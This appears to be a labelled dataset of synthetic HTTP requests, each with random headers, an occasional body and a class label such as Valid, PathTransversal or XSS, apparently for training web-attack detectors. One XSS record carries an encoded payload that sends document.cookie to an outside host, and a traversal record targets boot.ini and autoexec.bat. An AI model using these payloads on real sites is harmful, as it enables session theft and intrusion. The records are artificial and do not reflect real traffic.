Cookie: dne8uwas=4293;he=31887763;eze=n2f>)is8ebo-eqco0d:e;iAeh3oits8ridu=pp2oTnxtermte
Cookie2: $Version="1"
Date: Sun, 20 Aug 06 14:42:01 GMT
ETag: W/"h6BO4lSOeHIukUAXMVV"
Expect: 100-continue
From: 0talRina@qieneot.fr
If-Modified-Since: Sun, 09 Jan 05 12:20:10 UTC
If-Unmodified-Since: Sat, 09 Oct 04 14:55:04 UTC
If-Match: "uW4F_fhoVIBvr_5osigL"
If-None-Match: *
If-Range: *
Max-Forwards: 90
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic bXZuNkV0cmI6cmF1b2VyZWU=
Authorization: Basic d05lZTppZGF0Vg==
Range: 69893-,12785-855,77-
Referer: http://spb6Ahpn.it/luoAn.swf
TE: chunked
Trailer: User-Agent
User-Agent: Mozilla/0.5 (compatible; Konqueror/8.8; Win 9x; ntte; zyqUsd)
UA-CPU: Sparc
UA-Disp: 5566,8703,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 213x610
Via: FTP/7.2 www.fesNea.html
Transfer-Encoding: deflate
Upgrade: e7e/6.9, s2Djif/7.0, h0Tni/4.2, ctah/9.9
Warning: 492 www.astoe3u.js "irotdAesefitoeiuos" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 222850324123398
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2416
Start - Id: 1850
class: Valid
GET /eGNaZdTabolQC/eomHiotNEosnadga2uW/egnN6VJTQkPgNGOf.jpeg? HTTP/1.1
Host: 139.165.5.107
Connection: keep-alive
Accept: video/*;q=0.4
Accept-Charset: x-mac-ce;q=0.3
Accept-Encoding: *
Accept-Language: yoit-asKISnai, ne-m, ce-ot2E;q=0.2
Cache-Control: min-fresh=2474
Client-ip: 22.189.233.176
Cookie: A2oRdfreeajie=200
Cookie2: $Version="513"
Date: Sat, 25 Feb 06 12:37:40 CET
ETag: "Ax-jm_fdfddxcb-a"
Expect: 100-continue
From: nentele8@rc6nelreEt.be
If-Modified-Since: Sat, 08 Sep 07 19:00:11 GMT
If-Unmodified-Since: Sun, 09 May 04 13:41:18 CET
If-Match: *
If-None-Match: "Vt@iEtRZKQKr2Xn"
If-Range: Tue, 28 Nov 06 11:22:04 UTC
Max-Forwards: 950
MIME-Version: 9.5
Pragma: ein6ks1d='lteTri'
Proxy-Authorization: NTLM aHV0blRvZXBhRXVxZmw0Z3MxUGVodG82Z3lldnRlb2FvY3MxOGlnbG9nbQ==
Authorization: Digest username="seSBnro"
Range: -34624,61390-055,75119-
Referer: http://www.t7uozjuE.de/qeiR/C7Qh/t7af.cgi
TE: chunked,trailers,trailers
Trailer: Range
User-Agent: Mozilla/4.1 (Machintosh; U; Mac OS X 8.7; eu-ez; rv:9.4.7) Gecko/66579008
UA-CPU: Sparc
UA-Disp: 868,0811,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 870x566
Via: FTP/4.3 www.eeItha1.jpeg, 5.0 www.lumxirHU.js:02, 5.9 www.fd8oS8l.jpeg
Transfer-Encoding: deflate
Upgrade: eeeDo/9.0
Warning: 891 118.182.25.94 "epdstea40lccSt7xiAtm" "Tue, 07 Sep 04 24:57:56 UTC"
X-Forwarded-For: 62.33.15.123
X-Serial-Number: 64954855399337418
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1850
Start - Id: 19504
class: Valid
GET /heyPiLz.nsf?Tm=etlr1Wd4fesinsra&Y8cV_NorWqHU=r_TA&OlsausMht4=w%28sexec+&rhmaRiIowassmee=lh&al=e4svyKMlLs&1JBj._U9V=toipyxitsey&zlsCien=ls%3E+u HTTP/1.0
Host: www.blrhu86nur.net
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: cp-950
Accept-Encoding: identity, gzip, deflate;q=0.5, identity;q=0.8, compress;q=0.1
Accept-Language: *
Cache-Control: 8Pilopl=lineirw
Client-ip: 18.139.125.60
Cookie: dmtfsOh=975;Tleih3fc9=;@Fm;dehre=isu7coNbin;IhjSe0=estyle;atere8=brprocessing-instructiona7Zacoo/ug'riboot.ini;Ieeamh4t=han z/dn
Cookie2: $Version="6"
Date: Sat, 12 Jan 08 12:51:43 GMT
ETag: "SVrVwZJDn6pIgWdg"
Expect: 100-continue
From: scdiN@rl4aweo.com
If-Modified-Since: Tue, 17 Aug 04 04:47:17 UTC
If-Unmodified-Since: Mon, 31 May 04 09:55:50 CET
If-Match: "yt5QM22Fbbo@URQ"
If-None-Match: *
If-Range: Mon, 13 Jul 09 19:03:57 GMT
Max-Forwards: 217
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.3p3m.de/49ldleap/eaosgltI/jsAreodj/5amiaon.bin
Authorization: Digest uri=http://geil.net/xrmir.jsp
Range: 3024-,3311-971779,259112-9
Referer: /eiIot5h/OrlaoS/iifeoi/twelt.bin
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.8 (Machintosh; U; PPC 9.8; lc-b2; rv:7.3.3) Gecko/08453830
UA-CPU: x86
UA-Disp: 4215,3072,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 570x2839
Via: HTTP/0.5 35.108.79.220
Transfer-Encoding: identity
Upgrade: Zelv/0.6, ehp/7.0, can/6.1
Warning: 327 www.0Udthi.gif "maedbbAi" "Sun, 01 May 05 02:24:09 UTC"
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 7307968388590
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19504
Start - Id: 33427
class: Valid
POST /8Bo1EmfQQ69/xOIWS/lHtidl38rdAirhG9i/ivECwJ/t7M5bQnpb_s/miSa.jpeg? HTTP/1.0
Content-Length: 168
Content-Language: s3kssi3
Content-Encoding: compress
Content-Location: /eqsgiaue/sbtrhi1d/cuscxlsn.png
Content-MD5: cmtpYThudGRyVG50ZXJpOA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 02 Apr 09 19:33:06 GMT
Last-Modified: Mon, 26 Apr 10 23:52:02 GMT
Host: 90.154.38.40
Connection: diber
Accept: */*;q=0.8
Accept-Charset: x-mac-ce;q=0.7, iso-8859-1, iso-8859-3;q=0.1, x-mac-ce;q=0.1, cp-932
Accept-Encoding: identity, identity;q=0.3
Accept-Language: ci7-ookdusc;q=0.7, mpercza-3d, gt-ly;q=0.0, ntsof-jeoes5
Cache-Control: min-fresh=03
Client-ip: 2.240.215.248
Cookie: efatss= eotkrr3w&hl\8=
Cookie2: $Version="9"
Date: Sun, 28 Feb 10 05:57:22 CET
ETag: W/"2Sir._prP3L5s@44"
Expect: 100-continue
From: airohua@gtscArwrS.org
If-Modified-Since: Mon, 04 Jul 05 05:27:46 GMT
If-Unmodified-Since: Sat, 03 Jul 04 02:44:12 CET
If-Match: *
If-None-Match: "LqCwQhAr1Le9EsG"
If-Range: Sat, 19 Sep 09 11:51:54 GMT
Max-Forwards: 8423
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM bTdpbGVkaFByY3N1U3R0cmh0cmphcml0bHVlb2thdVRmOWVoYTNlckVoYW8=
Authorization: Basic cHNzcnV0cjpneWVk
Range: -104
Referer: http://www.Jidt.st/ied9iweA/xatrce/ta60/utrtiedr.mdb
TE: gzip,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.2 (Windows; U; Win 9x 6.1; nq-th; rv:2.4.3) Gecko/19508513
UA-CPU: StrongARM
UA-Disp: 326,087,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 669x659
Via: 9.7 www.ERsevrv.css, idoUut/5.9 www.estgddt.png
Transfer-Encoding: identity
Upgrade: Hiieue/2.7, lues/7.4, rruAeT/8.3, troteO/5.1, Hhenaa/6.3
Warning: 293 182.183.228.1 "tleicervnM3ra" "Mon, 29 Dec 08 19:13:38 UTC"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 538088947583493833
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~

sF8tr=mu6var<Ztlqrn 8c&tscriptt2gqB_T=gt5Tusr&BUT67EBX=iAEinUDZb-c&cnuIesLl=18275379&aeer0Aso7s=iv3cp&etisnting=ngn4sboot.init&YseLh3eflosey=c9+Rgwt&er1pa33at=Ldivi

End - Id: 33427
Start - Id: 45305
class: PathTransversal
GET /atuceteudssos/k5yxrel5ttgUDOGPPJ/6r5htaccessf_libEreplaceboot.ini/byazrre/nnthrs/tQnckq5d0_uFYnpAhG/aiisboOis9tsiauqriil.htm?ssIo9hikr0fowaf=%3E%5Cvp&9rrevdGrnchfpwe=zhWunionls&oViisewket0rUe=e%29trip%24go+te%3Btrs7te9&9jpytesoltw=1a%25+ HTTP/1.1
Host: 80.154.138.11:80
Connection: keep-alive
Accept: text/html;q=0.7, audio/basic;q=0.6, image/*
Accept-Encoding: gzip, identity, identity;q=0.5, compress;q=0.9
Cookie: adaQtdiwe9twoni=0050;nyEwTbtelilt=\autoexec.bat;noAl9ku2dhtw=xo1f;ahcNnlmne=sku7bebsi;nseeorph2lvalr=73;ma=1656618195
Date: Fri, 11 Jul 08 19:17:25 UTC
If-Match: "XsPVET9y4pZvyFSm"
If-None-Match: "sDE3gSZ7es4GZWEj"
Pragma: no-cache
Authorization: etnset tesflfN=iiln
Referer: http://4svHHwIo.org/h2is/uh4fl/lSed/verr.bin
User-Agent: 5SW2RsHV2b http://www.isadAe.org
Via: 1.8 www.pttpul.png

null

End - Id: 45305
Start - Id: 31038
class: Valid
GET /@CNPp-cT/B7nY/eneesepni5aqqtegee/ia0cDn7inespoaASd/hsUCyvRw_lTUw@P/CB8.shtml? HTTP/1.0
Host: 247.170.225.251:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 8dhem-traw;q=0.8, 5qoeluha-mMao, nln5z-BeoNTLfh;q=0.6
Cache-Control: no-store
Client-ip: 39.5.59.243
Cookie: sftz=5108342197;jiruhdednbs=ewp-
Cookie2: $Version="0"
Date: Sat, 25 Apr 09 18:03:05 GMT
ETag: "4Qz7i2fqLNR-BZg3Z"
Expect: 100-continue
From: dhorkpeo@necsezdc4.be
If-Modified-Since: Thu, 22 Apr 04 11:06:29 CET
If-Unmodified-Since: Thu, 05 Jul 07 06:36:20 UTC
If-Match: *
If-None-Match: "PufCyM1Fjydvdv5vChN"
If-Range: Sun, 02 Oct 05 22:49:22 GMT
Max-Forwards: 7
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM bnQwbXNoNkluMGVsc3dhdmFpZXNucmh5dG9rbGdsYXNodHVv
Authorization: Digest username="eshrre"
Range: -14
Referer: /nvroeOd/Exjeo/vsts/LHnsaan.php3
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/2.3 (compatible; Konqueror/7.3; WinNT; slf23o2rp; haorr)
UA-CPU: MIPS
UA-Disp: 690,606,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 0898x5454
Via: HTTP/2.7 234.87.231.116:043, 9.7 www.pec9Fodn.png
Transfer-Encoding: identity
Upgrade: oUeu/6.8, irr/0.1, up39/8.9, 6Two/6.9
Warning: 549 88.129.127.197 "ioEqr1" "Fri, 12 Dec 08 18:53:48 GMT"
X-Forwarded-For: 212.22.173.189
X-Serial-Number: 827318624572609
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31038
Start - Id: 4145
class: Valid
PUT /mqehGcC/jXsderunnLenwnxra/ltlSaeSoTea5/iGX/arsariet76olaterse/p@1w.kEI/nqtyo/eIFmnduV4nl1t/r-2/oWVB8sEYA/oD.hlCCL/rmG9MZvMQrHyKH1.tiff? HTTP/1.1
Content-Length: 123
Content-Language: neE,etWC8e
Content-Encoding: identity
Content-Location: /gsEprN/teyC/rrrol.swf
Content-MD5: b2U1c29kMGVleWU4aW1ocw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Feb 08 20:23:54 UTC
Last-Modified: Sat, 19 Sep 09 11:14:37 UTC
Host: 121.154.4.196:80
Connection: keep-alive
Accept: text/xml;q=0.5
Accept-Charset: iso-10646-ucs-2;q=0.9
Accept-Encoding: 
Accept-Language: yOte-3oERleR;q=0.2
Cache-Control: min-fresh=0847
Client-ip: 208.3.235.79
Cookie: a3Riydndptbaooe= tdj43ietBhNssa
Cookie2: $Version="5"
Date: Thu, 25 Sep 08 18:36:42 UTC
ETag: W/"_1-3WCEs8-wch4J142"
Expect: 100-continue
From: Cfmatoy@rdbndch0ft.fr
If-Modified-Since: Fri, 03 Jul 09 02:51:48 CET
If-Unmodified-Since: Wed, 14 Jul 04 22:14:09 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Apr 05 21:30:30 UTC
Max-Forwards: 8363
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM czJlaWRhZGlsc2w1YTNod3Zhc2Zoc2hyeXR0Y2EwS3dlcmFtdzdPZmVjZW5sSGQ=
Authorization: Digest uri=http://tqodcT1n.de/ut7e/tBtaq/yoetvrnT/ontae5M/stYggc02.swf
Range: -9,-905
Referer: /emoagii.zip
TE: trailers,gzip;q=0.6
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.8 (compatible; Konqueror/7.4; Open BSD i386; Ecte)
UA-CPU: Sparc
UA-Disp: 192,906,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 4283x806
Via: 0.3 www.wowOhbat.shtml:3201, FTP/3.4 www.undva6t.htm, 7.8 www.os1sgern.css
Transfer-Encoding: gzip
Upgrade: hwse/6.1, u9heh/7.4, irm9/0.9, 6fero/4.3
Warning: 863 www.raceinup.gif "nuitsnrbafm" "Sat, 26 Dec 09 10:21:05 CET"
X-Forwarded-For: 120.79.175.50
X-Serial-Number: 5833814723
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hetr=t.ylT6x7i-&3dawhwskc=5Od TctCaT&gshA=euLslby7gvrn&ENtelnetKnOXZyU=1856&reyw7isOeevre=7762&feeak=79153049&EsiNioYseG=09

End - Id: 4145
Start - Id: 34050
class: Valid
POST /puJ24RjMkmBZ/tLGCwe3MaK.jsp? HTTP/1.1
Content-Length: 254
Content-Language: eehet,gtaoejbt
Content-Encoding: compress
Content-Location: http://oeegnman.gov/aollx/epaias/eatcnqe.css
Content-MD5: b0Vvbm5vYW9oZWxlZW9lZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Dec 07 19:20:29 CET
Last-Modified: Thu, 25 Feb 10 22:34:20 CET
Host: 4.242.43.184
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: Khdd-al1xMnke
Cache-Control: max-age=19
Client-ip: 81.120.65.212
Cookie: GfJti=aDoejhnsrm;q9MyhPhomeUhsb=ty&
Cookie2: $Version="3"
Date: Wed, 18 Nov 09 12:26:37 UTC
ETag: "Cx9BDqj@_O7bndUOk"
Expect: 100-continue
From: a66ero@negstqete.net
If-Modified-Since: Fri, 26 Nov 04 13:44:51 CET
If-Unmodified-Since: Thu, 30 Dec 04 03:57:59 GMT
If-Match: "ZbfW-Tuk3B4_cxLXsu"
If-None-Match: *
If-Range: *
Max-Forwards: 993
MIME-Version: 8.7
Pragma: a1i9w='nsiudit'
Proxy-Authorization: Digest qop=auth
Authorization: Basic cmk4eWw6c3VrZmg=
Range: 821815-50,1-
Referer: /stiote/aEpa4ad/uhhd.jpg
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: 2ebasO (a1OzaZR3; nX-cy0r0Iv)
UA-CPU: PowerPC
UA-Disp: 2533,0787,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 682x2942
Via: FTP/8.7 100.60.63.143, 1.7 www.mSeiseu.html, 2tvdj3/8.3 www.9nse.png:8963
Transfer-Encoding: deflate
Upgrade: eheps/1.6, k8an/6.2, gmti/1.1, Il76oa/5.8
Warning: 839 136.145.234.240:03 "8eru4Saovlliuyd" 
X-Forwarded-For: 104.247.66.182
X-Serial-Number: 14296843524
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eKuL220aeXcopy1=winntconnectirS&ea4r=852622829&dnetcatiN=e7s&xnt=ithl&lpskld=39&l8jp=<nno&y.RTwDeTBV=iohgc?m~6a+ewa&ptlo7dep8ais=ohIal&tbtliehtlwoo=includes&5wTt9temS4=4009&aeantse9p=im5yiz- mochaos&aABj=04410&w.execsnM=rAe&dosxecrriroeu1i=nxT?

End - Id: 34050
Start - Id: 18941
class: Valid
GET /eitdb8blo/ccbYpmes/ste/kYjEw4luwNKcnZTFNf6/1tootsskxas2e.msf?y1esenotirsdes=an9rXiptneshaoq&rah=97 HTTP/1.1
Host: www.3O1o.biz
Connection: close
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ts6lia-l, ep7s-eaicveT, W5wauae-a;q=0.9, tjidwa-heou9
Cache-Control: no-store
Client-ip: 248.148.61.44
Cookie: ityruu=tSRmG@zfy;gziTar=sjkhCtqf4291;hou2=vxsvgDMXrPp
Cookie2: $Version="63"
Date: Mon, 03 Nov 08 18:23:47 GMT
ETag: W/"@uw-xpOXGwmC-AX"
Expect: oetsEour
From: yhhrcnd@rmltnrr.ch
If-Modified-Since: Sun, 11 Apr 04 13:56:30 CET
If-Unmodified-Since: Sat, 03 Oct 09 05:56:40 GMT
If-Match: "zuwq_4r-sD5zqRa3wn-_"
If-None-Match: "pl.PVCat-7vAcPHMJ3PA"
If-Range: Wed, 17 Dec 08 16:18:26 CET
Max-Forwards: 505
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic Z25uZXQ6eXRURGF0dA==
Range: -4
Referer: /7psnante/tepea.asmx
TE: trailers,chunked,trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.6 (Machintosh; U; Mac OS X 1.6; ue-t1; rv:9.7.7) Gecko/17792001
UA-CPU: x86
UA-Disp: 2836,0618,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2163x0680
Via: 6fnmo/5.7 www.R6ttpuo.jpg, FTP/6.7 www.c1Ail.js, HTTP/8.1 91.127.137.234
Transfer-Encoding: rcHiyt; arta=wteh
Upgrade: galn/0.4, ss2C/2.0, o7ocRs/3.2
Warning: 692 44.133.112.13:93 "qeioOOte8asoelLtth" "Fri, 29 May 09 16:30:06 CET"
X-Forwarded-For: 85.156.7.96
X-Serial-Number: 27260320301
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18941
Start - Id: 26718
class: Valid
GET /uvRwiframelginand/ddrhrezt/lXEMQym193icc-J/A.rR9JtN/Eoihhatawe/XOobjectBuP0aE3ABU_Chttps/0cr0gr/ynuErnD/ttihyTecsCzr/e9eIeZ/eotilalogoeE/hyFsK.sh?sh=t&ispdre8E1ermTP=t&aetet=uasock_streamTf&trvrsrz6=Rtaat+&Hunion_JD3=xtq%3A&Ihqaccess_log_rEc.e=e1oeo&eeHoeipaclw6=fGS HTTP/1.1
Host: 151.242.154.35:4189
Connection: Ddtr
Accept: */*;q=0.4
Accept-Charset: iso-8859-15;q=0.3, iso-8859-6
Accept-Encoding: compress, deflate;q=0.4, identity
Accept-Language: etnea-o4;q=0.4, emkn-4fy;q=0.9
Cache-Control: min-fresh=92
Client-ip: 37.97.72.116
Cookie: mgm=omt2s;1goptMdORiQM=7o;9yoyyvtllTeTet=4564;9eEosystsnnfnhn=2;O9pmdRnha=8410
Cookie2: $Version="29"
Date: Wed, 09 May 07 15:14:51 GMT
ETag: "T8@J8mWCMvFmLewuG"
Expect: emaeoalh
From: i7Mua@nshie.it
If-Modified-Since: Tue, 28 Apr 09 04:19:13 GMT
If-Unmodified-Since: Fri, 07 Jul 06 14:43:28 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 1.9
Pragma: ott4eD='nso'
Proxy-Authorization: NTLM eWh0bXVpdW9ubGV1YWhlZEVzbnREbnQ0cmdvbHRFZGhlaXNpYUF0eXJhbQ==
Authorization: Basic T3Ntc3RvOmRjb3NhZUhh
Range: 05-95,262898-811682
Referer: http://Dino.fr/deanrt/74mBu6/rdabteca/2EA8aoa.php3
TE: gzip;q=0.3
Trailer: If-Match
User-Agent: Mozilla/3.3 (Machintosh; U; PPC 2.1; io-rr; rv:2.8.0) Gecko/78034229
UA-CPU: StrongARM
UA-Disp: 221,658,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 873x2179
Via: FTP/0.0 158.146.203.32, 2.1 www.oroooi2.tiff, 4.4 www.t4rKEaI.gif
Transfer-Encoding: ya58s
Upgrade: iagr/3.7
Warning: 653 www.rIlbwe.html:51762 "pn4htodnstaeHz" "Sat, 18 Dec 04 07:27:35 UTC"
X-Forwarded-For: 241.3.2.199
X-Serial-Number: 8174060600088
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26718
Start - Id: 5170
class: Valid
POST /eoen117jnhEaoeqinu/ehtetsphi1enmbrlltax/adunnrnrtwyvgedLaoao/aeSx/e6548YFUXQydJ.png? HTTP/1.0
Content-Length: 29
Content-Language: Bnt2,H,e9Eia7be
Content-Encoding: identity
Content-Location: http://www.13RtE4g.ch/ntaa/Te8itIb/tnocsa.mpeg
Content-MD5: c09uZG9yZGh2cnJ2aGUyYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Jun 07 19:51:31 UTC
Last-Modified: Sun, 18 Jan 09 15:40:13 UTC
Host: www.4nilwaz.it:80
Connection: htgdceS
Accept: */*;q=0.8
Accept-Charset: x-mac-greek;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 99.98.219.242
Cookie: r7ercwuhhwb=Twp-$;tke9BalwEoce=eeu;aii=6564;e9=eaqfern4dgq
Cookie2: $Version="249"
Date: Mon, 21 May 07 14:19:25 GMT
ETag: "3LvElF8WO-Ch-AusSu"
Expect: 100-continue
From: en4heth@ytElm.st
If-Modified-Since: Tue, 12 Oct 04 19:08:43 GMT
If-Unmodified-Since: Tue, 04 Jul 06 07:39:54 CET
If-Match: "AEx3LydQt9a@X5K.OTnW"
If-None-Match: "_RQlsVhHh.Wl-VQau"
If-Range: Tue, 08 Aug 06 03:13:33 CET
Max-Forwards: 5007
MIME-Version: 3.5
Pragma: rnw='ea3'
Proxy-Authorization: Digest uri=http://www.cmgaej.gov/eCna/cIiprpee/gnrena/not5ts.swf
Authorization: Basic czFpaGRoYzp2cWFlaGhz
Range: 28741-
Referer: /0rra/9indi8vr/7sol/2oe9ao/lxtln.php4
TE: chunked,gzip,trailers
Trailer: Authorization
User-Agent: odhsrThi3h
UA-CPU: x86
UA-Disp: 279,387,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 938x1515
Via: 7.0 www.zdmm.tiff, FTP/7.9 www.einhbsh.html
Transfer-Encoding: compress
Upgrade: midie/5.1
Warning: 512 www.sdnrh.js "2goR" "Mon, 28 Aug 06 22:43:34 UTC"
X-Forwarded-For: 175.0.173.196
X-Serial-Number: 083639126
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

WvQWEIhikPj=stdin8Ninzlp2dcne

End - Id: 5170
Start - Id: 47603
class: XSS
GET /o99h_-UF-mr/mseyhWoMcCeqJop/erpcdlEneezejiigdmtk/uL_s-DAiGwWvuI6YgCt-/e5U/oUqHiV_ol.css?2httpYq4ahP6=%3Cimg++++src%3D%26%7B%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ilitne.com%2Fcgi-bin%2Fndictais.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B+%3E&es3detdr=2132 HTTP/1.1
Host: www.bMrwOba.it
Connection: keep-alive
Accept: text/xml
Accept-Charset: *;q=0.0
Accept-Encoding: identity, gzip, deflate, identity, compress;q=0.1
Accept-Language: iedoli-aurudaIe, e-Etutoe;q=0.1, dSsnbcdE-1e1c3, dl3diRie-iu5
Cache-Control: only-if-cached
Client-ip: 179.141.108.140
Cookie: GKlink19BA=42;le7V7@=tpu;ileasiyietln0=473;df=tHekJp4ZUvG;ansa2m0=35024694;eudeaofnrstEi9=et0
Cookie2: $Version="9"
Date: Sat, 03 Nov 07 22:10:28 UTC
ETag: "nwTH@gkWC5HyBDgr7v"
Expect: pUonr4u1
From: zl3e2@1ftosH.com
If-Modified-Since: Thu, 24 Jan 08 06:18:35 GMT
If-Unmodified-Since: Wed, 07 Jan 09 12:30:07 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 00
MIME-Version: 8.3
Pragma: Skaeuth=gEshlD
Proxy-Authorization: 0yeere 7neifuPe=Hsrbcstt
Authorization: tl7roE r0ua199a=uE1o5
Range: 849916-
Referer: http://anom.fr/ssha/aagj9/a3et8s.jpg
TE: trailers,deflate
Trailer: Trailer
User-Agent: Mozilla/2.4 (Windows; U; Win 9x 6.5; if-cs; rv:7.0.9) Gecko/60986386
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 608x141
Via: 0.3 www.Qtetnp6.css, 4.7 32.131.159.128, 82gd/5.2 122.59.42.154
Transfer-Encoding: compress
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 002 240.231.55.176:97 "DparR" 
X-Forwarded-For: 28.174.36.198
X-Serial-Number: 2524902769036083814
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47603
Start - Id: 29013
class: Valid
GET /bodybodyboot.ini/rRTcboa5mru/sqDrkmwn/aIGUOsKRzQJY/PVpgzC2t/rNasdshgnSqi.png?lawswecshitA=qh0d&otti7=pepqaOjf&sMrhaieedt=4qGmAoz7yMs&tPdea6r0scn=a-oszwm&Ncg4sawp8Ot=tdiee%25ttocnmaap&bonepetkoab=0Mn6&Hiyicder=7911414&lRB=dtynhm+ywoa%26o&nEse=ho9btl5u9cijiihmo5&aySrou1ap=sNaotsaaemiecito&tzTa3=7057879&oaopiOhsrtntqn=1slee HTTP/1.1
Host: www.xojdsa.be
Connection: anttwa
Accept: image/jpeg;q=0.6, text/html;q=0.3, video/mpeg;q=0.0
Accept-Charset: iso-8859-8-i;q=0.1
Accept-Encoding: compress
Accept-Language: 6ddn-ni4asnoa, op-1lxa5;q=0.8, tii-eidnjk, tritdsL-ap;q=0.9
Cache-Control: re='s0eI'
Client-ip: 198.229.45.18
Cookie: ecechg=795;1E2c3mwp-=3uRwDwhyzktieC;.oEPwp-4oMG=8|eselect;ii=572026;7xrtonMasNrU=1225982
Cookie2: $Version="422"
Date: Tue, 29 Mar 05 24:11:23 UTC
ETag: W/"5G1CsBdFle22Xtr"
Expect: 100-continue
From: e8z2rsr@hhsecdIax.be
If-Modified-Since: Mon, 20 Nov 06 18:56:53 UTC
If-Unmodified-Since: Fri, 30 Dec 05 21:56:02 UTC
If-Match: *
If-None-Match: "MGME.zGjFdDRsbpu"
If-Range: "Z1jGvlK8jnouLRF"
Max-Forwards: 47
MIME-Version: 2.4
Pragma: uWnNk=sqc
Proxy-Authorization: Basic b29pdDo0dnQ2ek9t
Authorization: Basic Y2JuaTpTczhvemE=
Range: 2318-,-7
Referer: /0xoilhn/zosrf/sN3Riec.jpg
TE: trailers,chunked;q=0.2,trailers
Trailer: If-Range
User-Agent: dtdorheobC/8.7.7.9
UA-CPU: x86
UA-Disp: 023,422,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 694x8428
Via: 6.9 8.251.112.210
Transfer-Encoding: compress
Upgrade: rpq0t/1.3, h5yess/6.6
Warning: 848 www.1zbi.js "tteneag" 
X-Forwarded-For: 234.170.143.94
X-Serial-Number: 055751373307057
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29013
Start - Id: 28085
class: Valid
GET /4nmwNro7rV.png? HTTP/1.0
Host: www.crux.ch
Connection: close
Accept: video/*;q=0.9, image/*;q=0.4
Accept-Charset: *
Accept-Encoding: identity;q=0.5, compress;q=0.3, deflate;q=0.0, compress;q=0.2, deflate;q=0.5
Accept-Language: *
Cache-Control: ist=riEd7lte
Client-ip: 221.222.128.150
Cookie: tTeei1acsv=t=ke3l2tei+ai;ce5uaoos=1631150;Vseekenh3eld=28971;irDwn=@uya;6aisnhcS=Gf9hcq
Cookie2: $Version="58"
Date: Mon, 06 Feb 06 24:38:52 CET
ETag: "kaHI3OtH8wtvtOHxAaDh"
Expect: 100-continue
From: pnlav3j@ifnra.biz
If-Modified-Since: Sun, 09 Apr 06 12:48:38 GMT
If-Unmodified-Since: Wed, 08 Jun 05 03:01:17 CET
If-Match: "qT0DGDLDna93ku."
If-None-Match: *
If-Range: "rm6fujgYs1Y2tIc"
Max-Forwards: 9471
MIME-Version: 0.9
Pragma: enenit=Taul7n
Proxy-Authorization: cvue udao=aeeC
Authorization: Digest response="3BFbE706e207dFCd0A089aC7dCcB05b8"
Range: -0194
Referer: http://xelsn.net/ia71yd/na8Qoiua/2nfSneI.swf
TE: deflate,chunked;q=0.6
Trailer: User-Agent
User-Agent: m4Dt/1.9.8.8.6
UA-CPU: MIPS
UA-Disp: 5267,7369,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 682x3357
